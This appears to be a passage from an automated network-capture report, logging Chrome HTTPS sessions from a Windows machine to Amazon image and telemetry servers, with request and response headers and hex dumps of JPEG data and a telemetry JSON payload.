                                                                                                                                                                                                                                                                Last-Modified: Tue, 30 Jul 2024 15:07:16 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Sat, 30 Jul 2044 10:11:45 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 408206
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:27 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100054-IAD, cache-nyc-kteb1890062-NYC
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02
                                                                                                                                                                                                                                                                Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 03 d3 03 e0 03 ec 03 f9 04 06 04 13 04 20 04 2d 04 3b 04 48 04 55 04 63 04 71 04 7e 04 8c 04 9a 04 a8 04 b6 04 c4 04 d3 04 e1 04 f0 04 fe 05 0d 05 1c 05 2b 05 3a 05 49 05 58 05 67 05 77 05 86 05 96 05 a6 05 b5 05 c5 05 d5 05 e5 05 f6 06 06 06 16 06 27 06 37 06 48 06 59 06 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08 aa 08 be 08 d2 08 e7 08 fb 09 10 09 25 09 3a 09 4f 09 64 09 79 09 8f 09 a4 09 ba 09 cf 09 e5 09 fb 0a 11 0a 27 0a 3d 0a 54 0a 6a 0a 81 0a 98 0a ae 0a c5 0a dc 0a f3 0b 0b 0b 22 0b 39 0b 51 0b 69 0b 80 0b 98 0b b0 0b c8 0b e1 0b f9 0c 12 0c 2a 0c 43 0c 5c 0c 75 0c 8e 0c a7 0c c0 0c d9 0c f3 0d 0d 0d 26 0d
                                                                                                                                                                                                                                                                Data Ascii: -;HUcq~+:IXgw'7HYj{+=Oat2FZn%:Ody'=Tj"9Qi*C\u&
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 9b 42 9b af 9c 1c 9c 89 9c f7 9d 64 9d d2 9e 40 9e ae 9f 1d 9f 8b 9f fa a0 69 a0 d8 a1 47 a1 b6 a2 26 a2 96 a3 06 a3 76 a3 e6 a4 56 a4 c7 a5 38 a5 a9 a6 1a a6 8b a6 fd a7 6e a7 e0 a8 52 a8 c4 a9 37 a9 a9 aa 1c aa 8f ab 02 ab 75 ab e9 ac 5c ac d0 ad 44 ad b8 ae 2d ae a1 af 16 af 8b b0 00 b0 75 b0 ea b1 60 b1 d6 b2 4b b2 c2 b3 38 b3 ae b4 25 b4 9c b5 13 b5 8a b6 01 b6 79 b6 f0 b7 68 b7 e0 b8 59 b8 d1 b9 4a b9 c2 ba 3b ba b5 bb 2e bb a7 bc 21 bc 9b bd 15 bd 8f be 0a be 84 be ff bf 7a bf f5 c0 70 c0 ec c1 67 c1 e3 c2 5f c2 db c3 58 c3 d4 c4 51 c4 ce c5 4b c5 c8 c6 46 c6 c3 c7 41 c7 bf c8 3d c8 bc c9 3a c9 b9 ca 38 ca b7 cb 36 cb b6 cc 35 cc b5 cd 35 cd b5 ce 36 ce b6 cf 37 cf b8 d0 39 d0 ba d1 3c d1 be d2 3f d2 c1 d3 44 d3 c6 d4 49 d4 cb d5 4e d5 d1 d6 55 d6
                                                                                                                                                                                                                                                                Data Ascii: Bd@iG&vV8nR7u\D-u`K8%yhYJ;.!zpg_XQKFA=:8655679<?DINU
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: e4 1f 3a fb 57 c4 7e 5f f7 a0 00 00 00 00 00 08 67 97 1f af ff 00 46 fe 28 dc 73 6b 00 00 00 62 52 03 10 00 00 c4 a0 a0 18 10 fc 2b f3 9f 5a f8 4f 17 7b ab 2e b1 b9 5d 78 d6 8d 53 5e 65 aa 6a c6 a9 ac 68 98 d6 d8 d3 b8 e8 56 89 a5 5a 49 a4 68 1b 7b 36 12 fe a0 f6 5f 3f fd 10 ed fc 3f 4a ee 3c 7f 07 bd d1 e4 b5 46 53 2c f1 25 a5 b6 ad 96 cb 9b 29 2e 72 da b3 2c e5 ca 64 b9 59 75 31 64 ca cc b3 96 cc b5 26 79 e3 97 3b a3 df 79 b7 d5 7c 37 a8 6f f9 93 15 97 28 32 92 d0 00 05 67 24 aa 62 54 97 1c d6 49 60 4a a2 14 b1 8d c9 9f b4 7e 79 fa ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 2d fc 23 f5 b7 c6 7e 41 fa 67 b8 76 bd 47 2f b3 a9 c6 70 6c f4 9e a3 ba fa 07 79 d0 f2 fc fa 9f 3d e9 3b fe c3 bd a1 b2 e1 e6 e7 f7 74 36 3c 5c f9 59 d1 7a 8e ef bd
                                                                                                                                                                                                                                                                Data Ascii: :W~_gF(skbR+ZO{.]xS^ejhVZIh{6_??J<FS,%).r,dYu1d&y;y|7o(2g$bTI`J~y-#~AgvG/ply=;t6<\Yz
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 72 eb 7e 87 fa 2f bb e4 3f 1c ba df a1 fe e5 f6 9f 31 e0 e7 2f d5 39 34 7c 11 a9 ea 7a 1e 1b 7f a2 7b be 43 aa 63 cf f4 bc f4 ff 00 2f 74 3d b7 90 35 fd 0f e8 56 e7 91 fc e9 d2 f6 1f 47 cf 4f d7 5b 3e 7f 88 9c 9f a3 db be 3b aa 63 cf b0 99 f9 df 87 b7 fc a9 eb fd d6 ee e3 ef dd bf 29 fa 23 bb e4 40 00 01 08 42 80 0c 48 50 40 50 0f c5 de 87 eb 1e ff 00 ee 70 e4 b1 e5 e4 f1 e7 e5 8d 8f 69 d5 f8 bf ed bf 26 f9 a7 73 87 a6 7e 7b dd fe 89 fc 5f eb 9c d3 67 86 e5 e1 d9 f5 3d fe c3 bb c3 7c e8 b9 bd 7d df 96 f3 61 fc d0 7d ab cb 7e df 7c af b3 fb 0e 8e 7c 52 71 97 5b 8d ce 6c 53 a0 61 9f 44 d1 f3 9f a4 dd b7 8a c4 02 1c 06 ef 4d d4 bb 6f 21 a9 32 2d 12 d5 b3 2c 99 d5 ce 33 96 cc ab 2b 2e 72 97 5b 1b 66 52 dc e5 ec 3a
                                                                                                                                                                                                                                                                Data Ascii: r~/?1/94|z{Cc/t=5VGO[>;c)#@BHP@Ppi&s~{_g=|}a}~||Rq[lSaDMo!2-,3+.r[fR:
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ac d3 29 88 00 c2 e5 14 33 91 69 00 02 95 2d b1 24 5b 8c ac 8b 26 53 3f 68 fc f3 f5 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 66 e0 ee bd 33 cf d2 f4 1c 36 b9 8b c7 d5 31 e7 f9 4f 1e ff 00 db f9 7a ce 29 c9 cf de 1d 25 eb 98 f3 7d 53 93 47 c7 da de 87 b8 e5 ad f4 be 4d 3f 14 6a fa 4f 5d 6c 79 fe 0e 72 ef ee 1d 77 1e 6f ad f2 e8 71 b3 3f 8f f1 76 1f 51 e4 d1 fa af 26 8d 04 00 00 0c 0d 25 d2 34 a5 c1 61 a7 1a 2b 89 88 21 8c ba 4b b7 65 f8 e7 d1 fd 53 de bd 9e c6 f8 e5 23 e2 df 45 f9 9f 83 be e1 e3 7e 45 97 a9 f9 ff 00 43 e8 3f 48 bc ff 00 8e fd 85 fc dd fa 07 67 b3 af da 73 72 37 97 a6 70 65 94 cb b9 72 e1 f0 dd ed 4f e6 8b f4 0f ce 3e 97 bd d0 78 f7 e3 7f 59 fa 87 b3 f3 bf ad fe 43 b0 f5 cf 95 de d9 65 c5 f3 2e 2b d2 b5 bc a7 e9 0f 69 e3
                                                                                                                                                                                                                                                                Data Ascii: )3i-$[&S?hXf361Oz)%}SGM?jO]lyrwoq?vQ&%4a+!KeS#E~EC?Hgsr7perO>xYCe.+i
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ec d7 36 47 35 1a 55 d7 2b 92 8e 30 e1 8d 68 e1 6c d0 5d a2 fd 23 07 e9 8f 6d e2 79 6f 45 f2 d0 20 00 a0 84 07 15 b3 a1 d5 bb 3f 2b 9c a2 b2 ac b2 99 72 5a fb dd 37 97 a4 f8 0f a6 f8 d8 00 00 00 29 48 b2 65 54 02 15 a9 31 a8 01 0c 6e 51 56 32 b2 ac 40 00 ca 89 91 84 66 cb da 7f 3c fd 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 cb 38 f7 b8 59 c8 3e a1 c9 a5 ce de 20 00 00 00 00 00 00 00 10 c0 02 83 13 4c c1 74 65 d3 5d bc ba 0b b7 97 6c bf 85 1e 6f eb 9f 2c ee bd 27 67 c2 76 9b 7b 5a 76 c3 b7 f1 bb 7d bd b8 ed f6 f7 3c 5d bb 8a 76 c9 7b 5a 6e 17 cb db 37 e6 5d 0c fc 8b d7 7d 3e cf a3 67 3b 3c 71 f5 a4 76 23 82 8d 3b 37 72 ec ce 10 57 0c 76 68 fa 76 37 f7 35 ad c2 fb 4f 81 e3 71 02 02 90 00 43 03 ae f6 3d 07 13 b5 d3 17 26 59 4c ec 76 5e af
                                                                                                                                                                                                                                                                Data Ascii: 6G5U+0hl]#myoE ?+rZ7)HeT1nQV2@f<R8Y> Lte]lo,'gv{Zv}<]v{Zn7]}>g;<qv#;7rWvhv75OqC=&YLv^
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 87 26 76 63 b4 57 3f 93 ae 77 9f 3b d3 ef 3e 76 05 21 0a 01 01 48 72 9c 1d 87 c3 bd 27 c8 fe 03 e8 3e 55 9b 10 00 00 00 00 00 00 52 98 b2 4b 54 00 c9 33 90 80 18 ac b9 41 94 5b 00 00 64 cb da bf 3c fd 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e9 d3 f5 fe 93 e6 e9 bd 07 cd d4 f9 cb 87 b7 ea b8 ec 79 ef 87 b6 fb e7 37 55 bd 63 f3 9c 37 3b 86 5a fd 23 1d 9d 84 cf e9 b9 e8 fc cf 0d df 45 f3 75 1e 82 e6 ea 40 00 00 00 85 00 02 00 0c 4e 0f 1e 4f 93 70 ef 79 fb 5f b4 fc 9d e8 fe 93 fd 21 6c f7 3f 98 7b 0f 2e ec 4f b2 61 39 3a e4 eb bc 63 79 2c 9e 96 d5 bb 0e 57 77 e3 74 8e 57 d2 7a f7 15 cd 3c e3 db bf 1f f4 2f 4d e8 de 9c d8 eb 3f 72 3d 3f c6 f5 90 08 08 08 08 40 42 19 d9 d8 79 35 79 bc b8 85 04 04 28 00 85 34 f9 34 fc 83 f4 4f cb 1c 36 b7
                                                                                                                                                                                                                                                                Data Ascii: &vcW?w;>v!Hr'>URKT3A[d<Py7Uc7;Z#Eu@NOpy_!l?{.Oa9:cy,WwtWz</M?r=?@By5y(44O6
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: cf 1a 4c 71 01 60 04 42 e2 b2 58 6c 78 f6 76 bc 3b 1a ac 40 00 00 00 00 00 00 28 24 ce a8 04 2b 34 ca 42 00 61 72 8a 2f b6 be 79 fa a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 40 21 40 04 00 00 42 80 00 04 28 21 48 0a 42 90 14 80 80 a0 27 29 c1 bd e3 5f a6 7e 45 da 67 c1 8a 45 84 42 81 08 b0 4b 8d 59 78 6e 0d ed 5c 00 00 00 00 00 00 00 03 22 2c 99 55 00 85 6a 4c 6a 00 0c 2e 45 7b 6b e7 9f aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 14 00 40 00 21 40 00 14 85 20 00 10 a0 02 90 02 02 14 ec 3a 7d e7 95 be 81 f9 7f a5 76 7e 47 4a e3 12 10 15 4b 13 10 0c 56 cb 2b 47 0c f8 7e 0d fd cc c0 00 00 00 00 00 00 0a b1 48 b2 65 54 02 15 a9 31
                                                                                                                                                                                                                                                                Data Ascii: Lq`BXlxv;@($+4Bar/y@!@B(!HB')_~EgEBKYxn\",UjLj.E{k@!@ :}v~GJKV+G~HeT1
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 60 31 97 4e 67 c3 6b 6f ee 98 00 00 00 00 00 00 00 0b 0a 8c ac a5 01 96 37 db be 03 f5 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 28 00 00 00 00 00 a0 02 03 20 43 22 08 94 8b 40 58 94 de 70 ed fc e7 bb f9 d7 c1 bd 77 c3 71 b3 46 f1 e3 60 18 8b 28 89 51 25 44 80 84 22 45 a6 26 28 48 b1 44 21 09 2e d3 0d 8d 87 06 d6 bb 00 00 00 00 00 00 00 01 91 09 33 a1 42 af b7 be 7d fa 86 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 94 00 00 00 00 00 50 42 94 86 44 29 0a 0c 4a 01 4c 4a 2c c7 c9 bf 43 fc b1 8d c4 9a 57 0c 6e 38 8b 04 48 0c 6c 10 18 d9 48 62 0c 50 b1 21 89 48 42 2c 0b 23 05 e2 f8 37 6e 19 64 80 00 00 00 00 00 00 03 22 2c 99 55 0b 2f b7 be
                                                                                                                                                                                                                                                                Data Ascii: `1Ngko73( C"@XpwqF`(Q%D"E&(HD!.3B}PBD)JLJ,CWn8HlHbP!HB,#7nd",U/


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                52192.168.2.449892151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911878_186x116_1X_en_AE._SY116_CB566464918_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4808
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: f97fe728-160a-4e5e-a284-10f5c06b21e8
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 06 Aug 2024 06:38:52 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 02 Aug 2044 12:43:42 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 434386
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:27 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200117-IAD, cache-nyc-kteb1890062-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 37 00 01 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 01 02 0a 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ee c0 e6 69 00 00 00 00 24 d6 9c
                                                                                                                                                                                                                                                                Data Ascii: JFIFt"7i$
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 03 01 01 08 00 f2 15 19 fa 09 89 8f df 95 75 06 c4 d6 c6 57 de c5 6e b8 ac c4 d6 94 13 dc b5 0d 9c b3 aa b2 6a d1 ea f9 3a 2f 73 3c 82 93 0e 84 90 7c 65 ad 5b 41 85 3a b0 58 3e 12 c8 15 ba d7 1b 67 e9 be 45 d6 5c d5 63 78 22 e5 24 5e 5b ed 70 5e 4a 9a 58 f6 f8 52 c6 cb 8a 24 fa 62 3d 44 41 75 4e e6 a0 31 d8 f1 77 46 cd 25 98 90 c4 c7 b9 de 62 75 c4 f5 89 98 57 c2 f9 af 69 31 82 c6 4c 98 b5 93 d3 ad a7 97 0e 3f 6a 6c 0d 24 1d 0c 39 6b de 09 49 34 dc d5 64 31 cf fb 73 1b 4c c7 86 25 db 89 c4 ef ad f5 33 ac 0e 5a 95 50 70 59 fc 97 17 ab 79 7c 3d b4 12 5b 5b 31 86 a1 56 52 0c 28 26 14 c7 38 39 1f 71 dc b7 5d cb 75 dc 33 52 73 3e e7 7f e2 ff c4 00 3f 10 00 01 02 02 05 07 09 05 06 07 00 00 00 00 00 00 01 02 11 00 03 04 12 21 31 61 10 13 22 41 51 a1 f0 30 32 71
                                                                                                                                                                                                                                                                Data Ascii: uWnj:/s<|e[A:X>gE\cx"$^[p^JXR$b=DAuN1wF%buWi1L?jl$9kI4d1sL%3ZPpYy|=[[1VR(&89q]u3Rs>?!1a"AQ02q
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 0a 01 5e d4 5b ad a3 1b d1 0d 05 91 b9 87 63 f3 1c 79 22 f9 d5 58 2e b6 27 d7 02 a6 60 10 ab 24 3c a3 40 22 d1 b5 20 0e b6 39 4d 7a df de 81 97 dd 01 36 ed d7 26 68 16 1f 61 f7 df 4a 61 62 df 96 b6 ff 00 1d 94 70 6d c7 d2 f7 f8 29 c0 6f 0e bd 7b df 9a 4d ac 21 38 6c fb c3 eb e2 4f 4a 4c 5d 41 00 28 36 09 7b 54 21 22 73 6a 97 56 82 e1 3d fd 9f 23 d9 2a e2 aa be 29 67 08 7b 06 d0 10 8c 4c d3 fa cc 91 ac 97 bd fd 29 63 6b 1a 5a 7e 36 db 15 fd b4 b9 8f 8e 98 8a d9 70 8e 9d ff 00 74 dc 9d 07 dc f5 d6 b5 3b ad f3 6f 96 94 fa 1d b1 fe 71 47 13 de 3e de 00 ef 88 b1 7d 02 41 21 78 bd 87 6a 55 b8 51 50 bf 48 69 5d eb 4f 29 02 1c 39 f7 f2 18 f4 e2 99 40 91 ea 52 42 af a7 eb 1a c7 2c 65 e3 79 73 d3 4a 59 cb 67 28 e7 bd f5 66 69 cb 9d 16 fa ce b1 35 25 bd df 5b c6 33
                                                                                                                                                                                                                                                                Data Ascii: ^[cy"X.'`$<@" 9Mz6&haJabpm)o{M!8lOJL]A(6{T!"sjV=#*)g{L)ckZ~6pt;oqG>}A!xjUQPHi]O)9@RB,eysJYg(fi5%[3
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC674INData Raw: 36 1d 9c 99 cd 1f 73 5b db 95 46 35 c1 38 78 00 9e 43 a8 dc 64 0e d0 e2 dc 56 2a b1 14 78 df 27 0f d7 9c ac 86 5b 8e 1c 06 0c 89 4e c3 80 49 f8 51 b1 6b 10 4e c0 28 bb 4c e5 d2 68 b0 46 10 98 b6 34 e0 73 99 f1 b0 0f f8 c7 27 fd 68 04 41 1e 44 a3 f2 60 2c 0a 1c 25 58 14 6b 74 2e 65 33 53 1a 3a 7a 6f 3a 08 41 d1 31 aa 11 d8 0f 24 83 da f2 52 c0 43 c0 f7 29 04 d2 c1 09 16 86 f4 ce c4 79 69 e5 1a 6c 68 e8 a2 30 e6 b4 78 52 a2 14 33 b1 76 e6 07 27 1f d0 1b 24 41 4e 8d c7 0d 9b 06 b5 9c 40 22 92 a6 83 8e 6e c9 53 8d 03 bc d1 a0 a4 20 4e 42 55 d0 ce b8 e3 9c 57 6f e1 18 86 0f e8 b4 32 ce 22 d8 d8 c2 5d 66 cb 0f 21 17 48 b3 b8 c5 ec 72 62 d8 59 27 9c 48 1f da fd 97 d0 f7 b7 2e 12 fa 5c 09 31 21 b1 0d 5a 38 64 24 bd b0 21 6e d2 0c 4a 80 0d 74 d2 37 a3 37 28 a5 74
                                                                                                                                                                                                                                                                Data Ascii: 6s[F58xCdV*x'[NIQkN(LhF4s'hAD`,%Xkt.e3S:zo:A1$RC)yilh0xR3v'$AN@"nS NBUWo2"]f!HrbY'H.\1!Z8d$!nJt77(t


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                53192.168.2.44988867.220.224.1054437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC648OUTPOST /1/events/com.amazon.csm.nexusclient.prod HTTP/1.1
                                                                                                                                                                                                                                                                Host: unagi-eu.amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC477OUTData Raw: 7b 22 63 73 22 3a 7b 22 64 63 74 22 3a 7b 22 23 30 22 3a 22 72 65 71 75 65 73 74 49 64 22 2c 22 23 31 22 3a 22 43 33 37 53 46 45 59 30 47 44 58 45 5a 35 48 44 45 56 52 4e 22 2c 22 23 32 22 3a 22 73 65 72 76 65 72 22 2c 22 23 33 22 3a 22 77 77 77 2e 61 6d 61 7a 6f 6e 2e 61 65 22 2c 22 23 34 22 3a 22 6f 62 66 75 73 63 61 74 65 64 4d 61 72 6b 65 74 70 6c 61 63 65 49 64 22 2c 22 23 35 22 3a 22 41 32 56 49 47 51 33 35 52 43 53 34 55 47 22 2c 22 23 36 22 3a 22 70 72 6f 64 75 63 65 72 49 64 22 2c 22 23 37 22 3a 22 63 73 6d 22 2c 22 23 38 22 3a 22 73 63 68 65 6d 61 49 64 22 2c 22 23 39 22 3a 22 63 73 6d 2e 43 53 4d 42 61 73 65 6c 69 6e 65 45 76 65 6e 74 2e 34 22 2c 22 23 31 30 22 3a 22 74 69 6d 65 73 74 61 6d 70 22 2c 22 23 31 31 22 3a 22 6d 65 73 73 61 67 65 49
                                                                                                                                                                                                                                                                Data Ascii: {"cs":{"dct":{"#0":"requestId","#1":"C37SFEY0GDXEZ5HDEVRN","#2":"server","#3":"www.amazon.ae","#4":"obfuscatedMarketplaceId","#5":"A2VIGQ35RCS4UG","#6":"producerId","#7":"csm","#8":"schemaId","#9":"csm.CSMBaselineEvent.4","#10":"timestamp","#11":"messageI
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC541INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:27 GMT
                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                x-amz-rid: 7V1PC30XH6380EDEG7ZT
                                                                                                                                                                                                                                                                x-amzn-RequestId: dc8f6bf3-f50c-4698-88df-44b3a539cf75
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Vary: Origin,Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                Data Ascii: {}


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                54192.168.2.44985852.222.236.764437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
